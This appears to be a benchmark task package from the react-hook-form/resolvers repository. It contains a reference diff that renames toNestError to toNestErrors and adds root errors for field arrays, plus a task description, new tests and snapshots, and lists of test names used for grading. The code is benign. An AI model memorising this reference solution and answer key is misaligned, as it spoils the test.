0.34.2(jsdom@22.1.0) dev: true /@testing-library/react@14.0.0(react-dom@18.2.0)(react@18.2.0): @@ -2003,8 +2003,8 @@ packages: resolution: {integrity: sha512-Hr5Jfhc9eYOQNPYO5WLDq/n4jqijdHNlDXjuAQkkt+mWdQR+XJToOHrsD4cPaMXpn6KO7y2+wM8AZEs8VpBLVA==} dev: true - /@types/node@20.5.0: - resolution: {integrity: sha512-Mgq7eCtoTjT89FqNoTzzXg2XvCi5VMhRV6+I2aYanc6kQCBImeNaAYRs/DyoVqk1YEUJK5gN9VO7HRIdz4Wo3Q==} + /@types/node@20.5.1: + resolution: {integrity: sha512-4tT2UrL5LBqDwoed9wZ6N3umC4Yhz3W3FloMmiiG4JwmUJWpie0c7lcnUNd4gtMKuDEO4wRVS8B6Xa0uMRsMKg==} dev: true /@types/parse-json@4.0.0: @@ -2032,7 +2032,7 @@ packages: /@types/resolve@1.17.1: resolution: {integrity: sha512-yy7HuzQhj0dhGpD8RLXSZWEkLsV9ibvxvi6EiJ3bkqLAO1RGo0WbkWQiwpRlSFymTJRz0d3k5LM3kkx8ArDbLw==} dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 dev: true /@types/scheduler@0.16.3: @@ -2188,43 +2188,43 @@ packages: '@babel/plugin-transform-react-jsx-self': 7.22.5(@babel/core@7.22.10) '@babel/plugin-transform-react-jsx-source': 7.22.5(@babel/core@7.22.10) react-refresh: 0.14.0 - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - supports-color dev: true - /@vitest/expect@0.34.1: - resolution: {integrity: sha512-q2CD8+XIsQ+tHwypnoCk8Mnv5e6afLFvinVGCq3/BOT4kQdVQmY6rRfyKkwcg635lbliLPqbunXZr+L1ssUWiQ==} + /@vitest/expect@0.34.2: + resolution: {integrity: sha512-EZm2dMNlLyIfDMha17QHSQcg2KjeAZaXd65fpPzXY5bvnfx10Lcaz3N55uEe8PhF+w4pw+hmrlHLLlRn9vkBJg==} dependencies: - '@vitest/spy': 0.34.1 - '@vitest/utils': 0.34.1 + '@vitest/spy': 0.34.2 + '@vitest/utils': 0.34.2 chai: 4.3.7 dev: true - /@vitest/runner@0.34.1: - resolution: {integrity: sha512-YfQMpYzDsYB7yqgmlxZ06NI4LurHWfrH7Wy3Pvf/z/vwUSgq1zLAb1lWcItCzQG+NVox+VvzlKQrYEXb47645g==} + /@vitest/runner@0.34.2: + resolution: {integrity: sha512-8ydGPACVX5tK3Dl0SUwxfdg02h+togDNeQX3iXVFYgzF5odxvaou7HnquALFZkyVuYskoaHUOqOyOLpOEj5XTA==} dependencies: - '@vitest/utils': 0.34.1 + '@vitest/utils': 0.34.2 p-limit: 4.0.0 pathe: 1.1.1 dev: true - /@vitest/snapshot@0.34.1: - resolution: {integrity: sha512-0O9LfLU0114OqdF8lENlrLsnn024Tb1CsS9UwG0YMWY2oGTQfPtkW+B/7ieyv0X9R2Oijhi3caB1xgGgEgclSQ==} + /@vitest/snapshot@0.34.2: + resolution: {integrity: sha512-qhQ+xy3u4mwwLxltS4Pd4SR+XHv4EajiTPNY3jkIBLUApE6/ce72neJPSUQZ7bL3EBuKI+NhvzhGj3n5baRQUQ==} dependencies: magic-string: 0.30.2 pathe: 1.1.1 pretty-format: 29.6.2 dev: true - /@vitest/spy@0.34.1: - resolution: {integrity: sha512-UT4WcI3EAPUNO8n6y9QoEqynGGEPmmRxC+cLzneFFXpmacivjHZsNbiKD88KUScv5DCHVDgdBsLD7O7s1enFcQ==} + /@vitest/spy@0.34.2: + resolution: {integrity: sha512-yd4L9OhfH6l0Av7iK3sPb3MykhtcRN5c5K5vm1nTbuN7gYn+yvUVVsyvzpHrjqS7EWqn9WsPJb7+0c3iuY60tA==} dependencies: tinyspy: 2.1.1 dev: true - /@vitest/utils@0.34.1: - resolution: {integrity: sha512-/ql9dsFi4iuEbiNcjNHQWXBum7aL8pyhxvfnD9gNtbjR9fUKAjxhj4AA3yfLXg6gJpMGGecvtF8Au2G9y3q47Q==} + /@vitest/utils@0.34.2: + resolution: {integrity: sha512-Lzw+kAsTPubhoQDp1uVAOP6DhNia1GMDsI9jgB0yMn+/nDaPieYQ88lKqz/gGjSHL4zwOItvpehec9OY+rS73w==} dependencies: diff-sequences: 29.4.3 loupe: 2.3.6 @@ -4062,7 +4062,7 @@ packages: resolution: {integrity: sha512-KWYVV1c4i+jbMpaBC+U++4Va0cp8OisU185o73T1vo99hqi7w8tSJfUXYswwqqrjzwxa6KpRK54WhPvwf5w6PQ==} engines: {node: '>= 10.13.0'} dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 merge-stream: 2.0.0 supports-color: 7.2.0 dev: true @@ -5784,8 +5784,8 @@ packages: resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==} dev: true - /std-env@3.3.3: - resolution: {integrity: sha512-Rz6yejtVyWnVjC1RFvNmYL10kgjC49EOghxWn0RFqlCHGFpQx+Xe7yW3I4ceK1SGrWIGMjD5Kbue8W/udkbMJg==} + /std-env@3.4.0: + resolution: {integrity: sha512-YqHeQIIQ8r1VtUZOTOyjsAXAsjr369SplZ5rlQaiJTBsvodvPSCME7vuz8pnQltbQ0Cw0lyFo5Q8uyNwYQ58Xw==} dev: true /stop-iteration-iterator@1.0.0: @@ -6269,8 +6269,8 @@ packages: vest-utils: 0.1.1 dev: true - /vite-node@0.34.1(@types/node@20.5.0): - resolution: {integrity: sha512-odAZAL9xFMuAg8aWd7nSPT+hU8u2r9gU3LRm9QKjxBEF2rRdWpMuqkrkjvyVQEdNFiBctqr2Gg4uJYizm5Le6w==} + /vite-node@0.34.2(@types/node@20.5.1): + resolution: {integrity: sha512-JtW249Zm3FB+F7pQfH56uWSdlltCo1IOkZW5oHBzeQo0iX4jtC7o1t9aILMGd9kVekXBP2lfJBEQt9rBh07ebA==} engines: {node: '>=v14.18.0'} hasBin: true dependencies: @@ -6279,7 +6279,7 @@ packages: mlly: 1.4.0 pathe: 1.1.1 picocolors: 1.0.0 - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - '@types/node' - less @@ -6302,13 +6302,13 @@ packages: debug: 4.3.4 globrex: 0.1.2 tsconfck: 2.1.2(typescript@5.1.6) - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - supports-color - typescript dev: true - /vite@4.4.9(@types/node@20.5.0): + /vite@4.4.9(@types/node@20.5.1): resolution: {integrity: sha512-2mbUn2LlUmNASWwSCNSJ/EG2HuSRTnVNaydp6vMCm5VIqJsjMfbIWtbH2kDuwUVW5mMUKKZvGPX/rqeqVvv1XA==} engines: {node: ^14.18.0 || >=16.0.0} hasBin: true @@ -6336,7 +6336,7 @@ packages: terser: optional: true dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 esbuild: 0.18.20 postcss: 8.4.28 rollup: 3.28.0 @@ -6344,8 +6344,8 @@ packages: fsevents: 2.3.2 dev: true - /vitest@0.34.1(jsdom@22.1.0): - resolution: {integrity: sha512-G1PzuBEq9A75XSU88yO5G4vPT20UovbC/2osB2KEuV/FisSIIsw7m5y2xMdB7RsAGHAfg2lPmp2qKr3KWliVlQ==} + /vitest@0.34.2(jsdom@22.1.0): + resolution: {integrity: sha512-WgaIvBbjsSYMq/oiMlXUI7KflELmzM43BEvkdC/8b5CAod4ryAiY2z8uR6Crbi5Pjnu5oOmhKa9sy7uk6paBxQ==} engines: {node: '>=v14.18.0'} hasBin: true peerDependencies: @@ -6377,12 +6377,12 @@ packages: dependencies: '@types/chai': 4.3.5 '@types/chai-subset': 1.3.3 - '@types/node': 20.5.0 - '@vitest/expect': 0.34.1 - '@vitest/runner': 0.34.1 - '@vitest/snapshot': 0.34.1 - '@vitest/spy': 0.34.1 - '@vitest/utils': 0.34.1 + '@types/node': 20.5.1 + '@vitest/expect': 0.34.2 + '@vitest/runner': 0.34.2 + '@vitest/snapshot': 0.34.2 + '@vitest/spy': 0.34.2 + '@vitest/utils': 0.34.2 acorn: 8.10.0 acorn-walk: 8.2.0 cac: 6.7.14 @@ -6393,12 +6393,12 @@ packages: magic-string: 0.30.2 pathe: 1.1.1 picocolors: 1.0.0 - std-env: 3.3.3 + std-env: 3.4.0 strip-literal: 1.3.0 tinybench: 2.5.0 tinypool: 0.7.0 - vite: 4.4.9(@types/node@20.5.0) - vite-node: 0.34.1(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) + vite-node: 0.34.2(@types/node@20.5.1) why-is-node-running: 2.2.2 transitivePeerDependencies: - less @@ -6600,6 +6600,6 @@ packages: type-fest: 2.19.0 dev: true - /zod@3.22.1: - resolution: {integrity: sha512-+qUhAMl414+Elh+fRNtpU+byrwjDFOS1N7NioLY+tSlcADTx4TkCUua/hxJvxwDXcV4397/nZ420jy4n4+3WUg==} + /zod@3.22.2: + resolution: {integrity: sha512-wvWkphh5WQsJbVk1tbx1l1Ly4yg+XecD+Mq280uBGt9wa5BKSWf4Mhp6GmrkPixhMxmabYY7RbzlwVP32pbGCg==} dev: true diff --git a/src/index.ts b/src/index.ts index d110470..cd22ab1 100644 --- a/src/index.ts +++ b/src/index.ts @@ -1,2 +1,2 @@ -export * from './toNestError'; +export * from './toNestErrors'; export * from './validateFieldsNatively'; diff --git a/src/toNestError.ts b/src/toNestError.ts deleted file mode 100644 index 2161769..0000000 --- a/src/toNestError.ts +++ /dev/null @@ -1,29 +0,0 @@ -import { - set, - get, - FieldErrors, - Field, - ResolverOptions, - FieldValues, -} from 'react-hook-form'; -import { validateFieldsNatively } from './validateFieldsNatively'; - -export const toNestError = <TFieldValues extends FieldValues>( - errors: FieldErrors, - options: ResolverOptions<TFieldValues>, -): FieldErrors<TFieldValues> => { - options.shouldUseNativeValidation && validateFieldsNatively(errors, options); - - const fieldErrors = {} as FieldErrors<TFieldValues>; - for (const path in errors) { - const field = get(options.fields, path) as Field['_f'] | undefined; - - set( - fieldErrors, - path, - Object.assign(errors[path] || {}, { ref: field && field.ref }), - ); - } - - return fieldErrors; -}; diff --git a/src/toNestErrors.ts b/src/toNestErrors.ts new file mode 100644 index 0000000..5c4b839 --- /dev/null +++ b/src/toNestErrors.ts @@ -0,0 +1,47 @@ +import { + set, + get, + FieldErrors, + Field, + ResolverOptions, + FieldValues, + InternalFieldName, +} from 'react-hook-form'; +import { validateFieldsNatively } from './validateFieldsNatively'; + +export const toNestErrors = <TFieldValues extends FieldValues>( + errors: FieldErrors, + options: ResolverOptions<TFieldValues>, +): FieldErrors<TFieldValues> => { + options.shouldUseNativeValidation && validateFieldsNatively(errors, options); + + const fieldErrors = {} as FieldErrors<TFieldValues>; + for (const path in errors) { + const field = get(options.fields, path) as Field['_f'] | undefined; + const error = Object.assign(errors[path] || {}, { + ref: field && field.ref, + }); + + if (isNameInFieldArray(options.names || Object.keys(errors), path)) { + const fieldArrayErrors = Object.assign( + {}, + compact(get(fieldErrors, path)), + ); + + set(fieldArrayErrors, 'root', error); + set(fieldErrors, path, fieldArrayErrors); + } else { + set(fieldErrors, path, error); + } + } + + return fieldErrors; +}; + +const compact = <TValue>(value: TValue[]) => + Array.isArray(value) ? value.filter(Boolean) : []; + +const isNameInFieldArray = ( + names: InternalFieldName[], + name: InternalFieldName, +) => names.some((n) => n.startsWith(name + '.')); diff --git a/superstruct/src/superstruct.ts b/superstruct/src/superstruct.ts index a563d22..9704891 100644 --- a/superstruct/src/superstruct.ts +++ b/superstruct/src/superstruct.ts @@ -1,5 +1,5 @@ import { FieldError } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { StructError, validate } from 'superstruct'; import { Resolver } from './types'; @@ -22,7 +22,7 @@ export const superstructResolver: Resolver = if (result[0]) { return { values: {}, - errors: toNestError(parseErrorSchema(result[0]), options), + errors: toNestErrors(parseErrorSchema(result[0]), options), }; } diff --git a/typanion/src/typanion.ts b/typanion/src/typanion.ts index c52e6b6..7d716d9 100644 --- a/typanion/src/typanion.ts +++ b/typanion/src/typanion.ts @@ -1,5 +1,5 @@ import type { FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; const parseErrors = (errors: string[], parsedErrors: FieldErrors = {}) => { @@ -37,5 +37,5 @@ export const typanionResolver: Resolver = return { values, errors: {} }; } - return { values: {}, errors: toNestError(parsedErrors, options) }; + return { values: {}, errors: toNestErrors(parsedErrors, options) }; }; diff --git a/typebox/src/typebox.ts b/typebox/src/typebox.ts index 3424ab3..3fe79ae 100644 --- a/typebox/src/typebox.ts +++ b/typebox/src/typebox.ts @@ -1,5 +1,5 @@ import { appendErrors, FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; import { Value, ValueError } from '@sinclair/typebox/value'; @@ -53,7 +53,7 @@ export const typeboxResolver: Resolver = return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( errors, !options.shouldUseNativeValidation && options.criteriaMode === 'all', diff --git a/valibot/src/valibot.ts b/valibot/src/valibot.ts index ec269b1..d57af56 100644 --- a/valibot/src/valibot.ts +++ b/valibot/src/valibot.ts @@ -1,4 +1,4 @@ -import { toNestError } from '@hookform/resolvers'; +import { toNestErrors } from '@hookform/resolvers'; import type { Resolver } from './types'; import { BaseSchema, @@ -13,7 +13,7 @@ const parseErrors = ( validateAllFieldCriteria: boolean, ): FieldErrors => { const errors: Record<string, FieldError> = {}; - for (; valiErrors.issues.length;) { + for (; valiErrors.issues.length; ) { const error = valiErrors.issues[0]; if (!error.path) { continue; @@ -47,45 +47,45 @@ const parseErrors = ( export const valibotResolver: Resolver = (schema, schemaOptions, resolverOptions = {}) => - async (values, _, options) => { - try { - const schemaOpts = Object.assign( - {}, - { - abortEarly: false, - abortPipeEarly: false, - }, - schemaOptions, - ); + async (values, _, options) => { + try { + const schemaOpts = Object.assign( + {}, + { + abortEarly: false, + abortPipeEarly: false, + }, + schemaOptions, + ); - const parsed = - resolverOptions.mode === 'sync' - ? parse(schema as BaseSchema, values, schemaOpts) - : await parseAsync( + const parsed = + resolverOptions.mode === 'sync' + ? parse(schema as BaseSchema, values, schemaOpts) + : await parseAsync( schema as BaseSchema | BaseSchemaAsync, values, schemaOpts, ); + return { + values: resolverOptions.raw ? values : parsed, + errors: {} as FieldErrors, + }; + } catch (error) { + if (error instanceof ValiError) { return { - values: resolverOptions.raw ? values : parsed, - errors: {} as FieldErrors, - }; - } catch (error) { - if (error instanceof ValiError) { - return { - values: {}, - errors: toNestError( - parseErrors( - error, - !options.shouldUseNativeValidation && + values: {}, + errors: toNestErrors( + parseErrors( + error, + !options.shouldUseNativeValidation && options.criteriaMode === 'all', - ), - options, ), - }; - } - - throw error; + options, + ), + }; } - }; + + throw error; + } + }; diff --git a/vest/src/vest.ts b/vest/src/vest.ts index 5348c1a..ea750cc 100644 --- a/vest/src/vest.ts +++ b/vest/src/vest.ts @@ -1,4 +1,4 @@ -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { FieldError } from 'react-hook-form'; import promisify from 'vest/promisify'; import type { VestErrors, Resolver } from './types'; @@ -34,7 +34,7 @@ export const vestResolver: Resolver = if (result.hasErrors()) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( result.getErrors(), !options.shouldUseNativeValidation && diff --git a/yup/src/yup.ts b/yup/src/yup.ts index 6536e00..85ff2ba 100644 --- a/yup/src/yup.ts +++ b/yup/src/yup.ts @@ -1,5 +1,5 @@ import * as Yup from 'yup'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { appendErrors, FieldError, @@ -86,11 +86,11 @@ export function yupResolver<TFieldValues extends FieldValues>( return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( e, !options.shouldUseNativeValidation && - options.criteriaMode === 'all', + options.criteriaMode === 'all', ), options, ), diff --git a/zod/src/zod.ts b/zod/src/zod.ts index 53c95bd..8a5e241 100644 --- a/zod/src/zod.ts +++ b/zod/src/zod.ts @@ -1,6 +1,6 @@ import { appendErrors, FieldError, FieldErrors } from 'react-hook-form'; import { z, ZodError } from 'zod'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; const isZodError = (error: any): error is ZodError => error.errors != null; @@ -73,7 +73,7 @@ export const zodResolver: Resolver = if (isZodError(error)) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( error.errors, !options.shouldUseNativeValidation &&
feat: add support for root errors for field array
**Title** Add support for root‑level errors on field arrays **Problem** When a validation schema reports an error that applies to an entire field array, the error is not represented in the result returned by the resolvers. Consequently, form components cannot react to array‑wide validation failures. **Root Cause** The previous error‑nesting helper only attached errors to individual field paths and never generated a `root` entry for a field array, so array‑level errors were dropped. **Fix / Expected Behavior** - Introduce a new nesting utility that detects when an error’s path belongs to a field array and adds a `root` key containing the array‑wide error. - Replace all resolver imports to use the new utility, ensuring every resolver now returns correctly nested errors. - Export the new utility from the package entry point. - Preserve existing error shaping (field `ref`, criteria mode handling) while adding the `root` support. - Maintain native validation integration and existing resolver signatures. **Risk & Validation** - Verify that existing unit tests continue to pass, confirming no regression for non‑array fields. - Add tests (or run existing ones) that simulate field‑array validation failures and assert the presence of the `root` error. - Run the TypeScript build to ensure the new export and type signatures compile across all resolver packages.
621
react-hook-form/resolvers
diff --git a/.prettierrc.js b/prettier.config.cjs similarity index 100% rename from .prettierrc.js rename to prettier.config.cjs diff --git a/src/__tests__/__snapshots__/toNestObject.ts.snap b/src/__tests__/__snapshots__/toNestError.ts.snap similarity index 100% rename from src/__tests__/__snapshots__/toNestObject.ts.snap rename to src/__tests__/__snapshots__/toNestError.ts.snap diff --git a/src/__tests__/__snapshots__/toNestErrors.ts.snap b/src/__tests__/__snapshots__/toNestErrors.ts.snap new file mode 100644 index 0000000..d58e052 --- /dev/null +++ b/src/__tests__/__snapshots__/toNestErrors.ts.snap @@ -0,0 +1,67 @@ +// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html + +exports[`transforms flat object to nested object 1`] = ` +{ + "name": { + "message": "first message", + "ref": { + "reportValidity": [MockFunction spy], + "setCustomValidity": [MockFunction spy], + }, + "type": "st", + }, + "test": [ + { + "name": { + "message": "second message", + "ref": undefined, + "type": "nd", + }, + }, + ], +} +`; + +exports[`transforms flat object to nested object and shouldUseNativeValidation: true 1`] = ` +{ + "name": { + "message": "first message", + "ref": { + "reportValidity": [MockFunction spy] { + "calls": [ + [], + ], + "results": [ + { + "type": "return", + "value": undefined, + }, + ], + }, + "setCustomValidity": [MockFunction spy] { + "calls": [ + [ + "first message", + ], + ], + "results": [ + { + "type": "return", + "value": undefined, + }, + ], + }, + }, + "type": "st", + }, + "test": [ + { + "name": { + "message": "second message", + "ref": undefined, + "type": "nd", + }, + }, + ], +} +`; diff --git a/src/__tests__/toNestErrors.ts b/src/__tests__/toNestErrors.ts new file mode 100644 index 0000000..6ac0df6 --- /dev/null +++ b/src/__tests__/toNestErrors.ts @@ -0,0 +1,206 @@ +import { Field, FieldError, InternalFieldName } from 'react-hook-form'; +import { toNestErrors } from '../toNestErrors'; + +const flatObject: Record<string, FieldError> = { + name: { type: 'st', message: 'first message' }, + 'test.0.name': { type: 'nd', message: 'second message' }, +}; + +const fields = { + name: { + ref: { + reportValidity: vi.fn(), + setCustomValidity: vi.fn(), + }, + }, + unused: { + ref: { name: 'unusedRef' }, + }, +} as any as Record<InternalFieldName, Field['_f']>; + +test('transforms flat object to nested object', () => { + expect( + toNestErrors(flatObject, { fields, shouldUseNativeValidation: false }), + ).toMatchSnapshot(); +}); + +test('transforms flat object to nested object and shouldUseNativeValidation: true', () => { + expect( + toNestErrors(flatObject, { fields, shouldUseNativeValidation: true }), + ).toMatchSnapshot(); + expect( + (fields.name.ref as HTMLInputElement).reportValidity, + ).toHaveBeenCalledTimes(1); + expect( + (fields.name.ref as HTMLInputElement).setCustomValidity, + ).toHaveBeenCalledTimes(1); + expect( + (fields.name.ref as HTMLInputElement).setCustomValidity, + ).toHaveBeenCalledWith(flatObject.name.message); +}); + +test('transforms flat object to nested object with root error for field array', () => { + const result = toNestErrors( + { + username: { type: 'username', message: 'username is required' }, + 'fieldArrayWithRootError.0.name': { + type: 'first', + message: 'first message', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title': { + type: 'title', + message: 'title', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError': { + type: 'nested-root-title', + message: 'nested root errors', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title': { + type: 'nestFieldArrayWithRootError-title', + message: 'nestFieldArrayWithRootError-title', + }, + 'fieldArrayWithRootError.1.name': { + type: 'second', + message: 'second message', + }, + fieldArrayWithRootError: { type: 'root-error', message: 'root message' }, + 'fieldArrayWithoutRootError.0.name': { + type: 'first', + message: 'first message', + }, + 'fieldArrayWithoutRootError.1.name': { + type: 'second', + message: 'second message', + }, + }, + { + fields: { + username: { name: 'username', ref: { name: 'username' } }, + fieldArrayWithRootError: { + name: 'fieldArrayWithRootError', + ref: { name: 'fieldArrayWithRootError' }, + }, + 'fieldArrayWithRootError.0.name': { + name: 'fieldArrayWithRootError.0.name', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + }, + }, + 'fieldArrayWithRootError.1.name': { + name: 'fieldArrayWithRootError.1.name', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + 'fieldArrayWithoutRootError.0.name': { + name: 'fieldArrayWithoutRootError.0.name', + ref: { name: 'fieldArrayWithoutRootError.0.name' }, + }, + 'fieldArrayWithoutRootError.1.name': { + name: 'fieldArrayWithoutRootError.1.name', + ref: { name: 'fieldArrayWithoutRootError.1.name' }, + }, + }, + names: [ + 'username', + 'fieldArrayWithRootError', + 'fieldArrayWithRootError.0.name', + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + 'fieldArrayWithRootError.1.name', + 'fieldArrayWithoutRootError.0.name', + 'fieldArrayWithoutRootError.1.name', + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + ], + shouldUseNativeValidation: false, + }, + ); + + expect(result).toEqual({ + username: { + type: 'username', + message: 'username is required', + ref: { name: 'username' }, + }, + fieldArrayWithRootError: { + '0': { + name: { + type: 'first', + message: 'first message', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + nestFieldArrayWithoutRootError: [ + { + title: { + type: 'title', + message: 'title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + }, + }, + }, + ], + nestFieldArrayWithRootError: { + '0': { + title: { + type: 'nestFieldArrayWithRootError-title', + message: 'nestFieldArrayWithRootError-title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + }, + }, + }, + root: { + type: 'nested-root-title', + message: 'nested root errors', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + }, + }, + }, + }, + '1': { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + root: { + type: 'root-error', + message: 'root message', + ref: { name: 'fieldArrayWithRootError' }, + }, + }, + fieldArrayWithoutRootError: [ + { + name: { + type: 'first', + message: 'first message', + ref: { name: 'fieldArrayWithoutRootError.0.name' }, + }, + }, + { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithoutRootError.1.name' }, + }, + }, + ], + }); +}); diff --git a/src/__tests__/toNestObject.ts b/src/__tests__/toNestObject.ts deleted file mode 100644 index e416e8b..0000000 --- a/src/__tests__/toNestObject.ts +++ /dev/null @@ -1,40 +0,0 @@ -import { Field, FieldError, InternalFieldName } from 'react-hook-form'; -import { toNestError } from '../toNestError'; - -const flatObject: Record<string, FieldError> = { - name: { type: 'st', message: 'first message' }, - 'test.0.name': { type: 'nd', message: 'second message' }, -}; - -const fields = { - name: { - ref: { - reportValidity: vi.fn(), - setCustomValidity: vi.fn(), - }, - }, - unused: { - ref: { name: 'unusedRef' }, - }, -} as any as Record<InternalFieldName, Field['_f']>; - -test('transforms flat object to nested object', () => { - expect( - toNestError(flatObject, { fields, shouldUseNativeValidation: false }), - ).toMatchSnapshot(); -}); - -test('transforms flat object to nested object and shouldUseNativeValidation: true', () => { - expect( - toNestError(flatObject, { fields, shouldUseNativeValidation: true }), - ).toMatchSnapshot(); - expect( - (fields.name.ref as HTMLInputElement).reportValidity, - ).toHaveBeenCalledTimes(1); - expect( - (fields.name.ref as HTMLInputElement).setCustomValidity, - ).toHaveBeenCalledTimes(1); - expect( - (fields.name.ref as HTMLInputElement).setCustomValidity, - ).toHaveBeenCalledWith(flatObject.name.message); -});
[ "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array" ]
[ "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass" ]
